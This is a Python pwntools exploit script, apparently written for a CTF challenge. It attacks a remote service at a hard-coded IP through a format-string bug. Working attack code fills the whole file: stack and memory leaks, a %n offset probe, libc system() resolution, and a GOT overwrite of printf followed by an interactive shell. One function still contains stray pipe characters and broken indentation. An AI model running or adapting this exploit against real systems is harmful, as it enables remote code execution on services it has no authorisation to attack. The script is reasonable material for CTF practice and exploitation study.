#!/usr/bin/python | |
import binascii
import struct
import sys

import pwn
# Remote CTF target this script talks to; every sub-command in __main__ opens a
# fresh pwntools connection to RHOST:RPORT.
# NOTE(review): running any sub-command sends exploit traffic (format-string
# reads and GOT writes) to this host - only do so against a target you are
# authorised to attack.
RHOST = "78.46.224.86"
RPORT = 1337
# Connection shared with the helpers that take no socket argument (leakFour,
# send_payload); __main__ assigns it before those helpers are used.
saveSocket = None
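def leakStringAt(s, address, offset=7):
    """Leak the NUL-terminated string at `address` with a %<offset>$s read.

    Sends "%<offset>$sAAAA" followed by the packed 64-bit address so that the
    address sits in the stack slot printf dereferences for `%<offset>$s` (the
    slot index is target-specific; 7 is what this script was built against).
    The "AAAA" marker separates the leaked bytes from the echoed remainder of
    the line.

    Args:
        s: pwntools tube to talk to.
        address: address to read from.
        offset: positional printf argument index holding the address.

    Returns:
        The leaked bytes (possibly "") on success; "" when the packed address
        contains a 0x0a byte and therefore cannot be sent with sendline; None
        when the service closed the connection or the reply did not contain
        the marker.

    Raises:
        EOFError: if the connection is already closed when sending (callers
        such as leakBlock catch this and return what they have).

    Caveat: if the leaked data itself contains "AAAA", everything after that
    first marker is dropped, so the result may be truncated.
    """
    payload = "%%%d$sAAAA" % offset + pwn.p64(address)
    # A newline inside the packed address would end the line early and
    # corrupt the format string, so refuse to send it at all.
    if "\n" in payload:
        print(" [!] newline in payload!")
        return ""
    s.sendline(payload)
    try:
        # Read from the tube we were given, not the module-global `p`.
        data = s.recv()
    except EOFError:
        print(" [X] EOFError trying to leak from %x" % address)
        return None
    # Only the bytes before the first marker are the leak.  The original
    # unpacked split("AAAA") into exactly two names and raised ValueError
    # whenever the marker was missing or appeared more than once.
    code, marker, _rest = data.partition("AAAA")
    if not marker:
        print(" [X] marker missing in reply while leaking from %x" % address)
        return None
    print(" [R] leaked %d bytes at %x" % (len(code), address))
    return code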
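def leakFour(address):
    """Leak callback for pwn.DynELF: return the 4 bytes at `address` as a str.

    Reads through the module-global `saveSocket` (set in __main__) via
    leakBlock and hex-dumps what was read.  DynELF probes many addresses,
    some of them unmapped, so a failed read is reported and turned into ''
    instead of aborting the symbol lookup.

    Returns:
        str of up to 4 bytes, or '' if the leak failed.
    """
    global saveSocket
    try:
        data = leakBlock(saveSocket, address, 4)[0:4]
        print(binascii.hexlify(data))
        return str(data)
    except Exception as exc:
        # The original used a bare `except:`, which also swallowed
        # KeyboardInterrupt and hid the reason for the failure.
        print(" [X] leakFour(%x) failed: %r" % (address, exc))
        return ''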
def leakStack(s, start, end):
    """Dump stack slots [start, end) with one "%<i>$p" directive per slot.

    Builds a single format string such as "%5$p%6$p..." , sends it over `s`
    and prints the raw reply so the caller can see which slot holds what.
    """
    directives = ["%%%d$p" % slot for slot in range(start, end)]
    s.sendline("".join(directives))
    print(s.recv())
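def leakStackPivot(s):
    """Probe stack slots 1..999 for the one that holds the input buffer.

    Each line is "AAAA%4n%<i>$p": `%n` is a *write* - it stores the number of
    characters printed so far (4, the "AAAA" prefix) through whatever pointer
    sits in the first vararg slot - and `%<i>$p` then prints slot i.  A reply
    containing "0004" suggests slot i is where that count landed, i.e. near
    the buffer.  Because of the `%n` this can crash the service when the first
    slot is not a writable pointer; it is a reconnaissance helper, not
    something to run blindly against a live target.

    NOTE(review): `%p` prints without zero padding, so a slot that becomes
    exactly 4 is printed as "0x4" and would not match "0004"; widen the check
    if the probe seems to miss.
    """
    for offset in range(1, 1000):
        s.sendline("AAAA%4n%" + str(offset) + "$p")
        # The original read from the module-global `p` instead of the tube it
        # was handed; use the parameter so the helper works on any connection.
        data = s.recv()
        if "0004" in data:
            print(" [!] MAYBE FOUND! offset %d : %s" % (offset, data))
        else:
            print(" [+] offset %d : %s" % (offset, data))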
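def leakBlock(s, address, size):
    """Leak `size` bytes starting at `address` using repeated %s reads.

    Each leakStringAt call returns the bytes up to the next NUL; that NUL is
    appended explicitly and the next read starts just past it, so the block
    is rebuilt one C string at a time.

    Failure handling:
      - "" from leakStringAt (address not sendable, see that function) is
        recorded as a NUL byte at that address - a guess, not a real read.
      - None (connection trouble / unusable reply) is recorded as a 0x00
        placeholder so the rest of the block stays aligned; the original
        silently dropped the byte, shifting everything after it.
      - EOFError stops the leak and returns what was gathered so far.

    Returns:
        bytearray of exactly `size` bytes (a %s read may run past the end and
        is truncated, because callers unpack fixed-width values), or fewer if
        the connection died part way through.
    """
    out = bytearray()
    remaining = size
    while remaining > 0:
        cursor = address + size - remaining
        try:
            data = leakStringAt(s, cursor)
        except EOFError:
            return out
        if data is None:
            print(" [!] could not read %x, substituting 0x00" % cursor)
            out += bytearray(b"\x00")
            remaining -= 1
            continue
        out += bytearray(data)
        # %s stops at the first NUL, which is therefore the next byte.
        out += bytearray(b"\x00")
        remaining -= len(data) + 1
    return out[:size]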
def send_payload(payload):
    """Send "AAAA" + payload over the shared `saveSocket` and return the reply.

    Used as the `execute_fmt` callback for pwn.FmtStr in __main__; the "AAAA"
    prefix is presumably what the hard-coded stack offset there assumes.
    Both the outgoing line and the reply are echoed with repr() for debugging.
    """
    line = "AAAA" + payload
    print(repr(line))
    saveSocket.sendline(line)
    reply = saveSocket.recv()
    print(repr(reply))
    return reply
def leakSystem(s):
    """Resolve libc's system() by walking the remote process with pwn.DynELF.

    The `s` parameter is unused: DynELF reads through leakFour, which in turn
    uses the module-global `saveSocket`, so that must already be set.
    0x400400 is the pointer inside the target binary that DynELF is started
    from.
    """
    resolver = pwn.DynELF(leakFour, 0x400400)
    addr = resolver.lookup('system', 'libc')
    print("SYSTEM at 0x%x" % addr)
    return addr
def pad255(string):
    """Right-pad `string` with 'A' to 256 bytes (despite the name: 256, not 255).

    Strings that are already 256 bytes or longer are returned unchanged -
    there is no truncation, so an over-long payload shifts whatever the caller
    appends after it.
    """
    fill = max(0, 256 - len(string))
    return string + "A" * fill
def convertToMagic(address): | |
data = struct.pack("<q",address) | |
totalDataWritten = 0 | |
out = "" | |
for i in range(0,len(data)): | |
newvalue = ord(data[i]) | |
if newvalue < totalDataWritten: | |
newvalue = 256 - totalDataWritten + newvalue | |
out += "%" + str(newvalue) + "c" + "%" + str(38 + i) + "$hhn" | |
totalDataWritten = 0 | |
elif newvalue == 0: | |
pass | |
elif newvalue == totalDataWritten: | |
out += "%" + str(38 + i) + "$hhn" | |
newvalue = 0 | |
else: | |
out += "%" + str(newvalue - totalDataWritten) + "c" + "%" + str(38 + i) + "$hhn" | |
totalDataWritten += newvalue | |
totalDataWritten %= 256 | |
print out | |
return out | |
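if __name__ == "__main__":
    # Sub-commands (each opens a fresh connection to RHOST:RPORT):
    #   leakstack START END   dump stack slots [START, END) with %<i>$p
    #   pivot                 probe which slot holds the input buffer (uses %n)
    #   dynelf                resolve system() via DynELF (diagnostic)
    #   exploit               leak printf@GOT, derive system, overwrite the GOT
    #   leak ADDR SIZE        dump SIZE bytes at ADDR to a file and disassemble
    if len(sys.argv) == 4 and sys.argv[1] == "leakstack":
        p = pwn.remote(RHOST, RPORT)
        leakStack(p, int(sys.argv[2], 0), int(sys.argv[3], 0))
        p.close()
        sys.exit(0)
    elif len(sys.argv) == 2 and sys.argv[1] == "pivot":
        p = pwn.remote(RHOST, RPORT)
        leakStackPivot(p)
        p.close()
        sys.exit(0)
    elif len(sys.argv) == 2 and sys.argv[1] == "dynelf":
        p = pwn.remote(RHOST, RPORT)
        saveSocket = p
        data = leakBlock(p, 0x00601018, 8)
        leakSystem(p)
        print("PRINTF at : " + binascii.hexlify(data))
        # Values observed on one run; the difference is the 0x10e80 delta
        # hard-coded in the exploit branch below.
        # PRINTF ACTUAL: 7f44671dd550
        # SYSTEM ACTUAL: 7f44671cc6d0
        # DIFF: 10e80
        p.close()
        sys.exit(0)
    elif len(sys.argv) == 2 and sys.argv[1] == "exploit":  # this is the right way to do it
        p = pwn.remote(RHOST, RPORT)
        # Stage 1: read printf's GOT entry (0x601018) to learn where libc is.
        data = leakBlock(p, 0x601018, 8)
        if len(data) != 8:
            # A short or over-long leak used to surface as a struct.error;
            # say what went wrong instead of tracebacking.
            print(" [X] leaked %d bytes of the GOT entry, need exactly 8 - aborting" % len(data))
            p.close()
            sys.exit(1)
        printf_addr = struct.unpack("<q", data)[0]
        print(" PRINTF AT 0x%x" % printf_addr)
        # 0x10e80 is printf - system in the *remote* libc build (see the
        # dynelf branch); it is not portable to other libc versions.
        system_addr = printf_addr - 0x10e80
        print(" SYSTEM AT 0x%x" % system_addr)
        print(" [!!!] stage 1 complete. try to write 0x%x to 0x601018" % system_addr)
        pwn.context.clear(arch='amd64')
        saveSocket = p
        # FmtStr is the manual alternative (f.write(0x601018, system_addr);
        # f.execute_writes()); the payload below is assembled by hand instead.
        f = pwn.FmtStr(execute_fmt=send_payload, offset=7)
        fmt_payload = pwn.fmtstr_payload(38, {0x601018: system_addr})
        fmt_new = "%".join(fmt_payload.split("%")[1:])
        print(" [!] autogen payload = " + fmt_new)
        # Stage 2: eight little-endian pointers 0x601018..0x60101f, one per
        # byte written by the %hhn directives.  They are appended after the
        # 256-byte padded format string, presumably so that they land at the
        # stack slots the payload generator (38...) addresses.
        GOT_ADDR_BLOCK = "".join(struct.pack("<Q", 0x601018 + i) for i in range(8))
        PAYLOAD_BLOCK = convertToMagic(system_addr)
        # Keep only the first "%<n>" count from the hand-rolled payload; every
        # remaining directive comes from pwntools' generator.
        payload_firsttoken = [PAYLOAD_BLOCK.split("c")[0]]
        autogen_tokens = fmt_new.split("c")[1:]
        newmagic = "c".join(payload_firsttoken + autogen_tokens)
        print(newmagic)
        print(" [!!!] sending magic\n")
        p.sendline(pad255(newmagic) + GOT_ADDR_BLOCK)
        print(p.recv())
        p.interactive()
        p.close()
        sys.exit(0)
    elif len(sys.argv) == 4 and sys.argv[1] == "leak":
        address = int(sys.argv[2], 0)
        size = int(sys.argv[3], 0)
        p = pwn.remote(RHOST, RPORT)
        data = leakBlock(p, address, size)
        # Keep the raw dump so it can be re-examined without leaking again.
        with open("%08x.elf" % address, "wb") as dump:
            dump.write(data)
        print(pwn.disasm(data, arch='amd64', vma=address))
        p.close()
        sys.exit(0)
    else:
        print("what do you want?>")
        print("usage: %s leakstack START END | pivot | dynelf | exploit | leak ADDR SIZE" % sys.argv[0])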